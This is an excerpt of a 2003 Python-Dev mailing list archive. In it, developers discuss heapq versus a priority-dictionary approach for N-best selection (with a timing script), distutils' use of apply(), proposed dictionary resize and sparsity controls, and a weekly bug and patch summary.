>> if we're trying to find the 10,000 poorest people in America, counting
>> only one as dead broke would be too Republican for some peoples' tastes
>> <wink>).  OTOH, heapq is easy and efficient for *that* class of heap
>> application.

[David Eppstein]
> I agree with your main points (heapq's inability to handle
> certain priority  queue applications doesn't mean it's useless, and
> its implementation-specific API helps avoid fooling programmers into
> thinking it's any more than what it is).  But I am confused at this
> example.  Surely it's just as easy to store (income,identity) tuples in
> either data structure.

As above, I was inside out.

"Just as easy" can't be answered without trying to write actual code,
though.  Given that heapq and priorityDictionary are both min-heaps, to
avoid artificial pain let's look for the people with the N highest incomes
instead.

For an N-best queue using heapq, "the natural" thing is to define people
like so:

class Person:
    def __init__(self, income):
        self.income = income

    def __cmp__(self, other):
        return cmp(self.income, other.income)

and then the N-best calculation is as follows; it's normal in N-best
applications that N is much smaller than the number of items being ranked,
and you don't want to consume more than O(N) memory (for example, google
wants to show you the best-scoring 25 documents of the 6 million matches it
found):

"""
# N-best queue for people with the N largest incomes.
import heapq

dummy = Person(-1)  # effectively an income of -Inf
q = [dummy] * N     # it's fine to use the same object N times

for person in people:
    if person > q[0]:
        heapq.heapreplace(q, person)

# The result list isn't sorted.
result = [person for person in q if person is not dummy]
"""

I'm not as experienced with priorityDictionary.  For heapq, the natural
__cmp__ is the one that compares objects' priorities.  For
priorityDictionary, we can't use that, because Person instances will be used
as dict keys, and then two Persons with the same income couldn't be in the
queue at the same time.  So Person.__cmp__ will have to change in such a way
that distinct Persons never compare equal.  I also have to make sure that a
Person is hashable.  I see there's another subtlety, apparent only from
reading the implementation code:  in the heap maintained alongside the dict,
it's actually

    (priority, object)

tuples that get compared.  Since I expect to see Persons with equal income,
when two such tuples get compared, they'll tie on the priority, and go on to
compare the Persons.  So I have to be sure too that comparing two Persons is
cheap.

Pondering all that for a while, it seems best to make sure Person doesn't
define __cmp__ or __hash__ at all.  Then instances will get compared by
memory address, distinct Persons will never compare equal, comparing Persons
is cheap, and hashing by memory address is cheap too:

class Person:
    def __init__(self, income):
        self.income = income

The N-best code is then:

"""
q = priorityDictionary()

for dummy in xrange(N):
    q[Person(-1)] = -1   # have to ensure these are distinct Persons

for person in people:
    if person.income > q.smallest().income:
        del q[q.smallest()]
        q[person] = person.income

# The result list is sorted.
result = [person for person in q if person.income != -1]
"""

Perhaps paradoxically, I had to know essentially everything about how
priorityDictionary is implemented to write a correct and efficient algorithm
here.  That was true of heapq too, of course, but there were fewer
subtleties to trip over there, and heapq isn't trying to hide its
implementation.

BTW, there's a good use of heapq for you:  you could use it to maintain the
under-the-covers heap inside priorityDictionary!  It would save much of the
code, and possibly speed it too (heapq's implementation of popping usually
requires substantially fewer comparisons than priorityDictionary.smallest
uses; this is explained briefly in the comments before _siftup, deferring to
Knuth for the gory details).

> If you mean, you want to find the 10k smallest income values (rather than
> the people having those incomes), then it may be that a better data
> structure would be a simple list L in which the value of L[i] is
> the count of people with income i.

Well, leaving pennies out of it, incomes in the USA span 9 digits, so
something taking O(N) memory would still be most attractive.



From eppstein@ics.uci.edu  Sun May  4 06:46:58 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Sat, 03 May 2003 22:46:58 -0700
Subject: [Python-Dev] Re: heaps
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEENNEEAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEENNEEAB.tim.one@comcast.net>
Message-ID: <17342817.1052002018@[10.0.1.2]>

On 5/4/03 1:26 AM -0400 Tim Peters <tim.one@comcast.net> wrote:
> it's normal in N-best applications that N is much smaller than the number
> of items being ranked, and you don't want to consume more than O(N)
> memory (for example, google wants to show you the best-scoring 25
> documents of the 6 million matches it found):

Ok, I think you're right, for this sort of thing heapq is better. One could 
extend my priorityDictionary code to limit memory like this but it would be 
unnecessary work when the extra features it has over heapq are not used for 
this sort of algorithm.

On the other hand, if you really want to find the n best items in a data 
stream large enough that you care about using only space O(n), it might 
also be preferable to take constant amortized time per item rather than the 
O(log n) that heapq would use, and it's not very difficult nor does it 
require any fancy data structures.  Some time back I needed some Java code 
for this, haven't had an excuse to port it to Python.  In case anyone's 
interested, it's online at 
<http://www.ics.uci.edu/~eppstein/161/KBest.java>.  Looking at it now, it 
seems more complicated than it needs to be, but maybe that's just the 
effect of writing in Java instead of Python (I've seen an example of a 
three-page Java implementation of an algorithm in a textbook that could 
easily be done in a dozen Python lines).
-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From eppstein@ics.uci.edu  Sun May  4 08:54:21 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Sun, 04 May 2003 00:54:21 -0700
Subject: [Python-Dev] Re: heaps
References: <LNBBLJKPBEHFEDALKOLCEENNEEAB.tim.one@comcast.net> <17342817.1052002018@[10.0.1.2]>
Message-ID: <eppstein-B31965.00542004052003@main.gmane.org>

In article <17342817.1052002018@[10.0.1.2]>,
 David Eppstein <eppstein@ics.uci.edu> wrote:

> On the other hand, if you really want to find the n best items in a data 
> stream large enough that you care about using only space O(n), it might 
> also be preferable to take constant amortized time per item rather than the 
> O(log n) that heapq would use, and it's not very difficult nor does it 
> require any fancy data structures.  Some time back I needed some Java code 
> for this, haven't had an excuse to port it to Python.  In case anyone's 
> interested, it's online at 
> <http://www.ics.uci.edu/~eppstein/161/KBest.java>.

BTW, the central idea here is to use a random quicksort pivot to shrink 
the list, when it grows too large.

In python, this could be done without randomization as simply as

def addToNBest(L,x,N):
    L.append(x)
    if len(L) > 2*N:
        L.sort()
        del L[N:]

It's not constant amortized time due to the sort, but that's probably 
more than made up for due to the speed of compiled sort versus 
interpreted randomized pivot.

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From skip@mojam.com  Sun May  4 13:00:24 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 4 May 2003 07:00:24 -0500
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200305041200.h44C0OY12616@manatee.mojam.com>

Bug/Patch Summary
-----------------

423 open / 3606 total bugs (+17)
137 open / 2130 total patches (+10)

New Bugs
--------

mmap's resize method resizes the file in win32 but not unix (2003-04-27)
	http://python.org/sf/728515
Long file names in osa suites (2003-04-27)
	http://python.org/sf/728574
ConfigurePython gives depreaction warning (2003-04-27)
	http://python.org/sf/728608
super bug (2003-04-28)
	http://python.org/sf/729103
building readline module fails on Irix 6.5 (2003-04-28)
	http://python.org/sf/729236
What's new in Python2.3b1 HTML generation. (2003-04-28)
	http://python.org/sf/729297
comparing versions - one a float (2003-04-28)
	http://python.org/sf/729317
rexec not listed as dead (2003-04-29)
	http://python.org/sf/729817
MacPython-OS9 eats CPU while waiting for I/O (2003-04-29)
	http://python.org/sf/729871
metaclasses, __getattr__, and special methods (2003-04-29)
	http://python.org/sf/729913
socketmodule.c: inet_pton() expects 4-byte packed_addr (2003-04-30)
	http://python.org/sf/730222
Unexpected Changes in list Iterator (2003-04-30)
	http://python.org/sf/730296
Not detecting AIX_GENUINE_CPLUSPLUS (2003-04-30)
	http://python.org/sf/730467
Python 2.3 bsddb docs need update (2003-05-01)
	http://python.org/sf/730938
HTTPRedirectHandler variable out of scope (2003-05-01)
	http://python.org/sf/730963
urllib2 raises AttributeError on redirect (2003-05-01)
	http://python.org/sf/731116
test_tarfile writes in Lib/test directory (2003-05-02)
	http://python.org/sf/731403
Importing anydbm generates exception if _bsddb unavailable (2003-05-02)
	http://python.org/sf/731501
Pimp needs to be able to update itself (2003-05-02)
	http://python.org/sf/731626
OSX installer .pkg file permissions (2003-05-02)
	http://python.org/sf/731631
Package Manager needs Help menu (2003-05-02)
	http://python.org/sf/731635
IDE "lookup in documentation" doesn't work in interactive wi (2003-05-02)
	http://python.org/sf/731643
GIL not released around getaddrinfo() (2003-05-02)
	http://python.org/sf/731644
An extended definition of "non-overlapping" would save time. (2003-05-04)
	http://python.org/sf/732120
Clarification of "pos" and "endpos" for match objects. (2003-05-04)
	http://python.org/sf/732124

New Patches
-----------

Fixes for setup.py in Mac/OSX/Docs (2003-04-27)
	http://python.org/sf/728744
test_timeout updates (2003-04-28)
	http://python.org/sf/728815
Compiler warning on Solaris 8 (2003-04-28)
	http://python.org/sf/729305
Dictionary tuning (2003-04-29)
	http://python.org/sf/729395
Add Py_AtInit() startup hook for extenders (2003-04-30)
	http://python.org/sf/730473
assert from longobject.c, line 1215 (2003-04-30)
	http://python.org/sf/730594
RTEMS does not have a popen (2003-04-30)
	http://python.org/sf/730597
socketmodule inet_ntop built when IPV6 is disabled (2003-04-30)
	http://python.org/sf/730603
pimp.py has old URL for default database (2003-05-01)
	http://python.org/sf/731151
redirect fails in urllib2 (2003-05-01)
	http://python.org/sf/731153
AssertionError when building rpm under RedHat 9.1 (2003-05-02)
	http://python.org/sf/731328
make threading join() method return a value (2003-05-02)
	http://python.org/sf/731607
SpawnedGenerator class for threading module (2003-05-02)
	http://python.org/sf/731701
find correct socklen_t type (2003-05-03)
	http://python.org/sf/731991
exit status of latex2html "ignored" (2003-05-04)
	http://python.org/sf/732143

Closed Bugs
-----------

"es#" parser marker leaks memory (2002-01-10)
	http://python.org/sf/501716
math.fabs documentation is misleading (2003-03-22)
	http://python.org/sf/708205
Lineno calculation sometimes broken (2003-03-24)
	http://python.org/sf/708901
Put a reference to print in the Library Reference, please. (2003-04-17)
	http://python.org/sf/723136
imaplib should convert line endings to be rfc2822 complient (2003-04-18)
	http://python.org/sf/723962
socketmodule doesn't compile on strict POSIX systems (2003-04-20)
	http://python.org/sf/724588
SRE bug with capturing groups in alternatives in repeats (2003-04-21)
	http://python.org/sf/725106
valgrind python fails (2003-04-24)
	http://python.org/sf/727051
tmpnam problems on windows 2.3b, breaks test.test_os (2003-04-26)
	http://python.org/sf/728097

Closed Patches
--------------

fix for bug 501716 (2003-02-11)
	http://python.org/sf/684981
OpenVMS complementary patches (2003-03-23)
	http://python.org/sf/708495
unchecked return values - compile.c (2003-03-23)
	http://python.org/sf/708604
Cause pydoc to show data descriptor __doc__ strings (2003-03-29)
	http://python.org/sf/711902
timeouts for FTP connect (and other supported ops) (2003-04-03)
	http://python.org/sf/714592
Modules/addrinfo.h patch (2003-04-22)
	http://python.org/sf/725942
Remove extra line ending in CGI XML-RPC responses (2003-04-25)
	http://python.org/sf/727805


From m@moshez.org  Sun May  4 19:55:44 2003
From: m@moshez.org (Moshe Zadka)
Date: 4 May 2003 18:55:44 -0000
Subject: [Python-Dev] Distutils using apply
Message-ID: <20030504185544.6010.qmail@green.zadka.com>

Hi!
I haven't seen this come up yet -- why is distutils still using apply?
It causes warnings to be emitted when building packages with Python 2.3
and -Wall, and is altogether unclean.

Is this just a matter of checking in a patch? Or submitting one to SF?
Or is there a real desire to be compatible to Python 1.5.2?
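
For anyone following along, here is a tiny illustration of the conversion in
question (the function is made up, not distutils code):

def configure(name, version='0.0', **extras):
    return (name, version, extras)

args = ('mypkg', '1.0')
kwds = {'author': 'Someone'}

old = apply(configure, args, kwds)   # 1.5.2-compatible spelling; warns under -Wall in 2.3
new = configure(*args, **kwds)       # extended call syntax, available since Python 2.0
assert old == new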

Thanks,
Moshe

-- 
Moshe Zadka -- http://moshez.org/
Buffy: I don't like you hanging out with someone that... short.
Riley: Yeah, a lot of young people nowadays are experimenting with shortness.
Agile Programming Language -- http://www.python.org/


From goodger@python.org  Sun May  4 20:18:04 2003
From: goodger@python.org (David Goodger)
Date: Sun, 04 May 2003 15:18:04 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <20030504185544.6010.qmail@green.zadka.com>
References: <20030504185544.6010.qmail@green.zadka.com>
Message-ID: <3EB5676C.1000900@python.org>

Moshe Zadka wrote:
> Or is there a real desire to be compatible to Python 1.5.2?

PEP 291 lists distutils as requiring 1.5.2 compatibility.

-- David Goodger



From python@rcn.com  Sun May  4 23:59:46 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 4 May 2003 18:59:46 -0400
Subject: [Python-Dev] Dictionary sparseness
Message-ID: <001301c31290$fcea25e0$125ffea9@oemcomputer>

After more dictionary sparseness experiments, I've become 
convinced that the ideal settings are better left up to the user 
who is in a better position to know:

* anticipated dictionary size 
* overall application memory issues
* characteristic access patterns (stores vs. reads vs. deletions vs. iteration)
* when the dictionary is growing, shrinking, or stabilized
* whether many deletions have taken place

I have two competing proposals to expose dictresize():

1)  d.resize(minsize=0)

The first approach allows a user to trigger a resize().  This is handy
after deletions have taken place and dictionary contents have become
stable.  It allows the dictionary to be rebuilt without dummy entries.

If the minsize factor is specified, then the dictionary will be built
to the specified size or larger if needed to achieve a power of two
or to accommodate existing entries.

That is handy when building a dictionary whose approximate size 
is known in advance because it eliminates all of the intermediate
resizes during construction.  For instance, the builtin dictionary can
be pre-sized for its 126 entries and will build more quickly.

It is also useful after dictionary contents have stabilized and the user
wants improved lookup time at the expense of additional memory
and slower iteration time.  For instance, the builtin dictionary can 
be resized to 500 entries making it so sparse that the lookups will 
typically hit on the first try.

This API requires a little user sophistication because the effects
get wiped out during the next automatic resize (when the dict is
two-thirds full). 


2)  d.setsparsity(factor=1)

The second approach does not allow dictionaries to be pre-sized,
but the effects do not get wiped out by normal dictionary activity.

It is handy when a particular dictionary's lookup/insertion time 
is more important than iteration time or space considerations.  
For instance, the builtin dictionary can be set to a sparsity factor 
of four so that lookups are more rapid.
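
For concreteness, here's how the two proposed calls might look at a call
site.  This is a sketch only -- neither method exists in any Python release
-- so the hasattr() guards keep it harmless to run as-is:

d = dict.fromkeys(range(126))     # roughly the size of the builtin namespace

if hasattr(d, 'resize'):          # proposal 1 (not implemented)
    d.resize(256)                 # rebuild, pre-sized, without dummy entries

if hasattr(d, 'setsparsity'):     # proposal 2 (not implemented)
    d.setsparsity(4)              # keep the table about 4x sparser from now on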


Raymond Hettinger



From drifty@alum.berkeley.edu  Mon May  5 00:27:16 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Sun, 4 May 2003 16:27:16 -0700 (PDT)
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <001301c31290$fcea25e0$125ffea9@oemcomputer>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
Message-ID: <Pine.SOL.4.55.0305041617190.15649@death.OCF.Berkeley.EDU>

[Raymond Hettinger]

> I have two competing proposals to expose dictresize():
>
> 1)  d.resize(minsize=0)
>
> The first approach allows a user to trigger a resize().  This is handy
> after deletions have taken place and dictionary contents have become
> stable.  It allows the dictionary to be rebuilt without dummy entries.
<snip - explanation of method>

The issue I see with this is people going overboard with calls to this.
I can easily imagine a new Python programmer calling this after every
insertion or deletion into the dictionary.  I can even see experienced
programmers getting trapped into this by coming up with a size and then
coding themselves into a corner by trying to maintain the size.  I also
see people coding a size that is optimal and then changing their code but
forgetting to change the value passed to the method, thus negating the
perk of having this option set.

> 2)  d.setsparsity(factor=1)
>
> The second approach does not allow dictionaries to be pre-sized,
> but the effects do not get wiped out by normal dictionary activity.
>
<snip>

This is more reasonable.  Since it is a factor, it will make sense to
beginners who view it as a sliding scale, and it also allows more experienced
programmers to set it to where they know they want the performance.  And
setting the value will more than likely be good no matter how the code is
changed since the use of the dictionary will most likely stay consistent.

Do either hinder dictionary performance just by introducing the possible
functionality?

I am -1 on 'resize' and +0, teetering on +1, for setsparsity.  I will kick
over to +1 if someone else out there with more experience with newbies can
say strongly that they don't see them messing up with this option.

-Brett

P.S.: Thanks, Raymond, for doing all of this work and documenting it so
well.


From guido@python.org  Mon May  5 01:34:33 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 04 May 2003 20:34:33 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: "Your message of Sun, 04 May 2003 18:59:46 EDT."
 <001301c31290$fcea25e0$125ffea9@oemcomputer>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
Message-ID: <200305050034.h450YXx23808@pcp02138704pcs.reston01.va.comcast.net>

> After more dictionary sparseness experiments, I've become 
> convinced that the ideal settings are better left up to the user 
> who is in a better position to know:
> 
> * anticipated dictionary size 
> * overall application memory issues
> * characteristic access patterns (stores vs. reads vs. deletions
>   vs. iteration)
> * when the dictionary is growing, shrinking, or stabilized
> * whether many deletions have taken place

Hm.  Maybe so, but it *is* a feature that there are no user controls
over dictionary behavior, based on the observation that for every user
who knows enough about the dict implementation to know how to tweak
it, there are at least 1000 who don't, and the latter, in their
ill-advised quest for more speed, will use the tweakage API to their
detriment.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Mon May  5 03:06:26 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sun, 4 May 2003 21:06:26 -0500
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <3EB5676C.1000900@python.org>
References: <20030504185544.6010.qmail@green.zadka.com>
 <3EB5676C.1000900@python.org>
Message-ID: <16053.50978.292901.471132@montanaro.dyndns.org>

    >> Or is there a real desire to be compatible to Python 1.5.2?

    David> PEP 291 lists distutils as requiring 1.5.2 compatibility.

Then should distutils be suppressing those warnings?

Skip


From tim.one@comcast.net  Mon May  5 03:20:09 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 04 May 2003 22:20:09 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <17342817.1052002018@[10.0.1.2]>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>

This is a multi-part message in MIME format.

--Boundary_(ID_19ec9GZ0WH09Yh6NFIvyew)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT

[David Eppstein]
> Ok, I think you're right, for this sort of thing heapq is better.
> One could extend my priorityDictionary code to limit memory like
> this but it would be unnecessary work when the extra features it
> has over heapq are not used for this sort of algorithm.

I don't believe memory usage was an issue here.  Take a look at the code
again (comments removed):

"""
q = priorityDictionary()

for dummy in xrange(N):
    q[Person(-1)] = -1

for person in people:
    if person.income > q.smallest().income:
        del q[q.smallest()]
        q[person] = person.income
"""

q starts with N entries.  Each trip around the loop either leaves the q
contents alone, or both removes and adds an entry.  So the size of the dict
is a loop invariant, len(q) == N.  In the cases where it does remove an
entry, it always removes the smallest entry, and the entry being added is
strictly larger than that, so calling q.smallest() at the start of the next
loop trip finds the just-deleted smallest entry still in self.__heap[0], and
removes it.  So the internal list may grow to N+1 entries immediately
following

        del q[q.smallest()]

but by the time we get to that line again it should be back to N entries
again.

The reasons I found heapq easier to live with in this specific app had more
to do with the subtleties involved in sidestepping potential problems with
__hash__, __cmp__, and the speed of tuple comparison when the first tuple
elements tie.  heapq also supplies a "remove current smallest and replace
with a new value" primitive, which happens to be just right for this app
(that isn't an accident <wink>):

"""
dummy = Person(-1)
q = [dummy] * N

for person in people:
    if person > q[0]:
        heapq.heapreplace(q, person)
"""

> On the other hand, if you really want to find the n best items in a data
> stream large enough that you care about using only space O(n), it might
> also be preferable to take constant amortized time per item rather than
> the O(log n) that heapq would use,

In practice, it's usually much faster than that.  Over time, it gets rarer
and rarer for

    person > q[0]

to be true (the new person has to be larger than the N-th largest seen so
far, and that bar gets raised whenever a new person manages to hurdle it),
and the vast majority of sequence elements are disposed with via that single
Python statement (the ">" test fails, and we move on to the next element
with no heap operations).  In the simplest case, if N==1, the incoming data
is randomly ordered, and the incoming sequence has M elements, the if-test
is true (on average) only ln(M) times (the expected number of left-to-right
maxima).  The order statistics get more complicated as N increases, of
course, but in practice it remains very fast, and doing a heapreplace() on
every incoming item is the worst case (achieved if the items come in sorted
order; the best case is when they come in reverse-sorted order, in which
case min(M, N) heapreplace() operations are done).
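
If anyone wants to see that effect directly, here's a throwaway simulation of
the N==1 case (my own sketch, separate from the timing script attached
below); the count of successful ">" tests should land close to ln(M):

import math, random

def count_updates(M):
    best = -1.0
    hits = 0
    for dummy in xrange(M):
        x = random.random()
        if x > best:            # same test as "person > q[0]" with N == 1
            best = x
            hits += 1
    return hits

M = 100000
trials = 20
avg = sum([count_updates(M) for dummy in xrange(trials)]) / float(trials)
print avg, math.log(M)   # avg should be close to ln(M); the exact expectation
                         # is the M-th harmonic number, about 12.1 here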

> and it's not very difficult nor does it require any fancy data
> structures.  Some time back I needed some Java code for this,
> haven't had an excuse to port it to Python.  In case anyone's
> interested, it's online at
> <http://www.ics.uci.edu/~eppstein/161/KBest.java>.
> Looking at it now, it seems more complicated than it needs to be, but
> maybe that's just the effect of writing in Java instead of Python
> (I've seen an example of a  three-page Java implementation of an
> algorithm in a textbook that could  easily be done in a dozen Python
> lines).

Cool!  I understood the thrust but not the details -- and I agree Java must
be making it harder than it should be <wink>.

> In python, this could be done without randomization as simply as
>
> def addToNBest(L,x,N):
>    L.append(x)
>    if len(L) > 2*N:
>        L.sort()
>        del L[N:]
>
> It's not constant amortized time due to the sort, but that's probably
> more than made up for due to the speed of compiled sort versus
> interpreted randomized pivot.

I'll attach a little timing script.  addToNBest is done inline there, some
low-level tricks were played to speed it, and it was changed to be a max
N-best instead of a min N-best.  Note that the list sort in 2.3 has a real
advantage over Pythons before 2.3 here, because it recognizes (in linear
time) that the first half of the list is already in sorted order (on the
second & subsequent sorts), and leaves it alone until a final merge step
with the other half of the array.

The relative speed (compared to the heapq code) varies under 2.3, seeming to
depend mostly on M/N.  The test case is set up to find the 1000 largest of a
million random floats.  In that case the sorting method takes about 3.4x
longer than the heapq approach.  As N gets closer to M, the sorting method
eventually wins; when M and N are both a million, the sorting method is 10x
faster.  For most N-best apps, N is much smaller than M, and the heapq code
should be quicker unless the data is already in order.

--Boundary_(ID_19ec9GZ0WH09Yh6NFIvyew)
Content-type: text/plain; name=timeq.py
Content-transfer-encoding: 7BIT
Content-disposition: attachment; filename=timeq.py

def one(seq, N):
    from heapq import heapreplace

    L = [-1] * N
    for x in seq:
        if x > L[0]:
            heapreplace(L, x)

    L.sort()
    return L

def two(seq, N):
    L = []
    push = L.append
    twoN = 2*N
    for x in seq:
        push(x)
        if len(L) > twoN:
            L.sort()
            del L[:-N]

    L.sort()
    del L[:-N]
    return L

def timeit(seq, N):
    from time import clock as now

    s = now()
    r1 = one(seq, N)
    t = now()
    e1 = t - s

    s = now()
    r2 = two(seq, N)
    t = now()
    e2 = t - s

    print len(seq), N, e1, e2
    assert r1 == r2

def tryone(M, N):
    from random import random
    seq = [random() for dummy in xrange(M)]
    timeit(seq, N)

for i in range(10):
    tryone(1000000, 1000)

--Boundary_(ID_19ec9GZ0WH09Yh6NFIvyew)--


From python@rcn.com  Mon May  5 03:22:08 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 4 May 2003 22:22:08 -0400
Subject: [Python-Dev] Dictionary sparseness
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305050034.h450YXx23808@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <003301c312ad$2113e520$125ffea9@oemcomputer>

> > After more dictionary sparseness experiments, I've become 
> > convinced that the ideal settings are better left up to the user 
> > who is in a better position to know:
> > 
> > * anticipated dictionary size 
> > * overall application memory issues
> > * characteristic access patterns (stores vs. reads vs. deletions
> >   vs. iteration)
> > * when the dictionary is growing, shrinking, or stabilized
> > * whether many deletions have taken place
> 
> Hm.  Maybe so, but it *is* a feature that there are no user controls
> over dictionary behavior, based on the observation that for every user
> who knows enough about the dict implementation to know how to tweak
> it, there are at least 1000 who don't, and the latter, in their
> ill-advised quest for more speed, will use the tweakage API to their
> detriment.

Perhaps there should be safety-belts and kindergarten controls:

   d.pack(fat=False) --> None.  Reclaims deleted entries.
         If optional fat argument is true, the internal size is doubled
         resulting in potentially faster lookups at the expense of
         slower iteration and more memory.
  
This ought to be both safe and simple.


Raymond Hettinger


P.S.  Also, I think it worthwhile to at least transform dictresize()
into PyDict_Resize() so that C extensions will have some control.
This would make it possible for us to add a single line making
the builtin dictionary more sparse and providing a 75% first probe
hit rate.



From skip@pobox.com  Mon May  5 03:24:31 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sun, 4 May 2003 21:24:31 -0500
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <001301c31290$fcea25e0$125ffea9@oemcomputer>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
Message-ID: <16053.52063.690466.272706@montanaro.dyndns.org>

    Raymond> After more dictionary sparseness experiments, I've become
    Raymond> convinced that the ideal settings are better left up to the
    Raymond> user who is in a better position to know:

Speaking as a moderately sophisticated Python programmer, I can tell you I
wouldn't have the slightest idea what the properties of my applications'
dictionary usage is.  Unless I'm going to get a major league speedup (like
factor of two or greater) tweaking these settings, I don't see that they'd
benefit me.

Skip


From python@rcn.com  Mon May  5 03:26:47 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 4 May 2003 22:26:47 -0400
Subject: [Python-Dev] Re: heaps
References: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>
Message-ID: <003f01c312ad$c7277580$125ffea9@oemcomputer>

> The relative speed (compared to the heapq code) varies under 2.3, seeming to
> depend mostly on M/N.  The test case is set up to find the 1000 largest of a
> million random floats.  In that case the sorting method takes about 3.4x
> longer than the heapq approach.  As N gets closer to M, the sorting method
> eventually wins; when M and N are both a million, the sorting method is 10x
> faster.  For most N-best apps, N is much smaller than M, and the heapq code
> should be quicker unless the data is already in order.

FWIW, there is a C implementation of heapq at:
   http://zhar.net/projects/python/


Raymond Hettinger 


From tim.one@comcast.net  Mon May  5 04:00:09 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 04 May 2003 23:00:09 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <003301c312ad$2113e520$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEPDEEAB.tim.one@comcast.net>

[Raymond Hettinger]
> ...
> P.S.  Also, I think it worthwhile to at least transform dictresize()
> into PyDict_Resize() so that C extensions will have some control.
> This would make it possible for us to add a single line making
> the builtin dictionary more sparse and providing a 75% first probe
> hit rate.

The dynamic hit rate is the one that counts, and, e.g., it's not going to
speed anything to remove the current lowest-8-but-not-lowest-9-bits
collision between 'ArithmeticError' and 'reload' (I've never seen the former
used, and the latter is expensive).  IOW, measuring the dynamic first-probe
hit rate is a prerequisite to selling this idea; a stronger prerequisite is
demonstrating actual before-and-after speedups.
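
(Checking a particular pair like that is easy enough to do by hand -- a
sketch; the answer depends on the string hash in use, so don't expect every
build to reproduce the collision described above:)

    # A 256-slot table indexes on the low 8 bits of the hash, a 512-slot
    # table on the low 9, so a first-probe collision is just an equality
    # test on the masked hashes.
    def first_probe_collision(a, b, table_size=256):
        mask = table_size - 1
        return (hash(a) & mask) == (hash(b) & mask)

    print(first_probe_collision('ArithmeticError', 'reload', 256))
    print(first_probe_collision('ArithmeticError', 'reload', 512))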

I agree with Guido that giving people controls they're ill-equipped to
understand will do more harm than good.  Even when they manage to stumble
into a small speedup, that will often become counterproductive over time, as
the characteristics of their ever-growing app change, and the Speed Weenie
who got the 2% speedup left, or moved on to some other project.  Or somebody
corrects the option name from 'smalest' to 'smallest', and suddenly the only
dict entry that mattered doesn't collide anymore -- but the mystery knob
boosting the dict size "because it sped things up" forever more wastes half
the space for a reason nobody ever understood.  Or we change Python's string
hash to use addition instead of xor to merge in the next character (a change
that may actually help a bit -- addition is a little better at scrambling
the bits).  Etc.

it's-python-it's-supposed-to-be-slow<wink>-ly y'rs  - tim



From eppstein@ics.uci.edu  Mon May  5 04:26:29 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Sun, 04 May 2003 20:26:29 -0700
Subject: [Python-Dev] Re: heaps
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>
Message-ID: <20414172.1052079989@[10.0.1.2]>

On 5/4/03 10:20 PM -0400 Tim Peters <tim.one@comcast.net> wrote:
> In practice, it's usually much faster than that.  Over time, it gets rarer
> and rarer for
>
>     person > q[0]
>
> to be true (the new person has to be larger than the N-th largest seen so
> far, and that bar gets raised whenever a new person manages to hurdle it),

Good point.  If any permutation of the input sequence is equally likely, 
and you're selecting the best k out of n items, the expected number of 
times you have to hit the data structure in your heapq solution is roughly 
k ln n, so the total expected time is O(n + k log k log n), with a really 
small constant factor on the O(n) term.  The sorting solution I suggested 
has total time O(n log k), and even though sorting is built-in and fast it 
can't compete when k is small.   Random pivoting is O(n + k), but with a 
larger constant factor, so your heapq solution looks like a winner.

For fairness, it might be interesting to try another run of your test in 
which the input sequence is sorted in increasing order rather than random. 
I.e., replace the random generation of seq by
    seq = range(M)
I'd try it myself, but I'm still running python 2.2 and haven't installed 
heapq.  I'd have to know more about your application to have an idea 
whether the sorted or randomly-permuted case is more representative.
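
(For reference, the heapq idiom under discussion looks roughly like this --
a sketch of the N-best loop, not the actual test harness being timed:)

    import heapq, random

    def n_largest(seq, n):
        # Min-heap of the n largest seen so far; heap[0] is the bar to beat.
        heap = list(seq[:n])
        heapq.heapify(heap)
        for item in seq[n:]:
            if item > heap[0]:
                heapq.heapreplace(heap, item)
        heap.sort()
        heap.reverse()
        return heap

    M, N = 1000000, 1000
    seq = [random.random() for i in range(M)]   # or seq = range(M) for the sorted case
    best = n_largest(seq, N)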

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From oren-py-d@hishome.net  Mon May  5 06:23:35 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 5 May 2003 01:23:35 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <20030504185544.6010.qmail@green.zadka.com>
References: <20030504185544.6010.qmail@green.zadka.com>
Message-ID: <20030505052335.GA37311@hishome.net>

On Sun, May 04, 2003 at 06:55:44PM -0000, Moshe Zadka wrote:
> Hi!
> I haven't seen this come up yet -- why is distutils still using apply?
